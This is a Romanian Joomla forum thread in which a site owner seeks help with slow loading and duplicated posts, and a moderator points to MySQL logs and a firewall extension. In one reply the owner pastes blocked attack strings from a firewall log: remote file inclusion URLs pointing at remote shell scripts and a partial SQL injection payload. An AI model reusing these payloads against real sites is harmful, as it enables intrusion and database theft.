slow load si dublari de postari

Moderator: Alex Dobrin

Locked
inn0
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 04, 2016 5:29 pm

slow load si dublari de postari

Post by inn0 » Fri Nov 04, 2016 6:02 pm

Salutare ,
as avea nevoie de cateva pareri . Am pus sus un site in joomla 3.6 destul de complex :
- jomsocial
- classifieds( adsmanager) + invoice
- forum kunena
- calendar : jcalpro
- galerie ignite gallery
- componente "custom" : curs valutar , vreme , horoscop
- module : ultimul album, poza random,

hostul este un server dedicat proc hexacore , 16 G Ram , spatiu cat China , centos 6, nginx , mysql

Simptome : siteul se incarca foarte incet la ore de varf si cand se posteaza ceva , se intampla ca se dubleaza postarea : ex acelasi anunt de 2 sau chiar .... 20 de ori , acelasi post pe forum de 2 ori, chiar ca si admin acelasi articol de 2 ori .


Un alt simtom : un user se inregistreaza , siteul "hangs out" cand userul da click pe creare cont ( dupa completarea formularului ) , Userul primeste emailul de confirmare , dar ..contul nu exista , deoarece serverul a dat time out sau a fost foarte incet si nu a "inregistrat contul" . Nu stiu exact procedura de inregistrare in back end , dar ciudat e ca emailul de confirmare catre user este trimis , dar contul nu este inregistrat .
( am avut emailuri "forward" de la useri carora nu le mai gaseam contul )



Inteleg ca problema poate fi complexa , dar niste idei sunt bine venite de unde putem incepe sa sapam .
Ceva tools de monitorizare , de inregistrare erori etc
Pare a fi ceva query in loop sau ceva query complex care omoara Mysql ul .
Ceva componenta care are nu e bine scrisa .



Orice idei sunt bine venite .

Multumesc .


PS : nu am crezut vreodata ca asa multe moduluri pot fi asa de prost scrise ptr joomla , am cumparat softuri a caror functionalitati nu erau terminate ,erau comentarii in cod de genul " aceata parte va fi reparata in versiunea urmatoare " . Am avut norocul de un developer bun care a administrat proiectul, dar mi-e mila de incepatori sau de unii care se asteapta ca softurile sa mearga din cutie .

Alex Dobrin
Joomla! Hero
Joomla! Hero
Posts: 2484
Joined: Wed Jun 07, 2006 9:10 am
Location: Brasov - Romania
Contact:

Re: slow load si dublari de postari

Post by Alex Dobrin » Fri Nov 04, 2016 6:46 pm

Salut,

La ce server ai nu ar trebui să apară astfel de întârzieri.

Par să fie ceva probleme mysql și îți recomand să începi căutarea de aici:
http://dev.mysql.com/doc/refman/5.7/en/ ... y-log.html

Deasemenea îți sugerez să instalezi AdminTools (https://www.akeebabackup.com/products/admin-tools.html) versiunea pro, să o configurezi cu atenție și apoi să urmărești log-urile din firewall-ul componentei.
My latest project - http://www.extraglaze.co.uk/

inn0
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 04, 2016 5:29 pm

Re: slow load si dublari de postari

Post by inn0 » Sun Nov 06, 2016 12:13 am

merci de sugestii, Admin tools il am instalat .
In firewaall in Security Exceptions Log am gasit foarte multe intrari de genul RFIShield .
/index.php?option=http://patrocinio.escuelaelsembrador.or ... ag/r57.txt?
/index.php?option=ftp://nadonu:nadonu2011@nadonu.zppdon.ru/envi.php?


Ce e ciudat ca am gasit una de la IP u meu inclusiv cu target url

/modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.picgor.it/html/style/content.gif
( chiar mi-am dat IP block , fara sa imi dau seama si a trebuit sa folosesc at IP , sa ma loghez ca si admin si sa scot blockul ,:) )

SQLi Shield

index.php?option=com_fireboard&Itemid=126&id=121985&catid=502&func=fb_pdf;declare%20@b%20cursor;declare%20@s%20varchar(8000);declare%20@w%20varchar(99);set%20@b=cursor%20for%20select%20DB_NAME()%20union%20select%20



UploadShield


tmpl= in URL


Siteul akeeba tocmai are niste probleme si nu pot vedea la ei pe site ce semnifica intrarile .

Alex Dobrin
Joomla! Hero
Joomla! Hero
Posts: 2484
Joined: Wed Jun 07, 2006 9:10 am
Location: Brasov - Romania
Contact:

Re: slow load si dublari de postari

Post by Alex Dobrin » Mon Nov 07, 2016 10:45 am

Din ce zici mie-mi pare că ai computerul virusat.
My latest project - http://www.extraglaze.co.uk/

inn0
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 04, 2016 5:29 pm

Re: slow load si dublari de postari

Post by inn0 » Mon Nov 07, 2016 4:03 pm

nu prea cred ca e computerul virusat , culmea e ca tocmai mi-am facut rebuild , sunt la zi cu Av si imi cam detecteaza orice misca in materie de siteuri virusate si pe pc si orice vine pe mail .

In trecut cand aveam joomla 1.x am avut siteul virusat de cateva ori si repede m-a detectat si Karspesky si Google .
Acum nu am nici unul din semnalele acestea .

Alex Dobrin
Joomla! Hero
Joomla! Hero
Posts: 2484
Joined: Wed Jun 07, 2006 9:10 am
Location: Brasov - Romania
Contact:

Re: slow load si dublari de postari

Post by Alex Dobrin » Mon Nov 07, 2016 4:32 pm

Dacă ți-a blocat IP-ul au fost mai multe accesări (dacă nu ai schimbat tu în setări să blocheze IP-ul după prima).
Și dacă zici că s-a accesat site-ul cu un URL ciudat, pe care nu îl recunoști, de pe IP-ul tău (la care nu are nimeni altcineva acces) nu văd ce altă explicație să fie.
My latest project - http://www.extraglaze.co.uk/

inn0
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 04, 2016 5:29 pm

Re: slow load si dublari de postari

Post by inn0 » Wed Nov 09, 2016 1:34 am

Alex , multumesc de sfaturi
inca sap , as avea o propunere .
vad ca forumul e configurat sa nu pot trimite msg privat .
Te pot contacta cumva ?

Alex Dobrin
Joomla! Hero
Joomla! Hero
Posts: 2484
Joined: Wed Jun 07, 2006 9:10 am
Location: Brasov - Romania
Contact:

Re: slow load si dublari de postari

Post by Alex Dobrin » Wed Nov 09, 2016 2:15 pm

La mine merg mesajele private. Probabil trebuie să ai un număr de post-ări pe forum.
Dacă vrei să îmi propui să lucrăm împreună, îmi pare rău, în momentul acesta nu am timp de început proiecte noi.
My latest project - http://www.extraglaze.co.uk/

inn0
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 04, 2016 5:29 pm

Re: slow load si dublari de postari

Post by inn0 » Wed Nov 09, 2016 4:04 pm

da , cred ca asta era faza , trebuie sa ai vechime pe forum pana sa poti scrie mesaje private .

Daca te poti desprinde 1 saptamana pentru niste reparatii , anunta-ma .


Locked

Return to “Romanian Forum”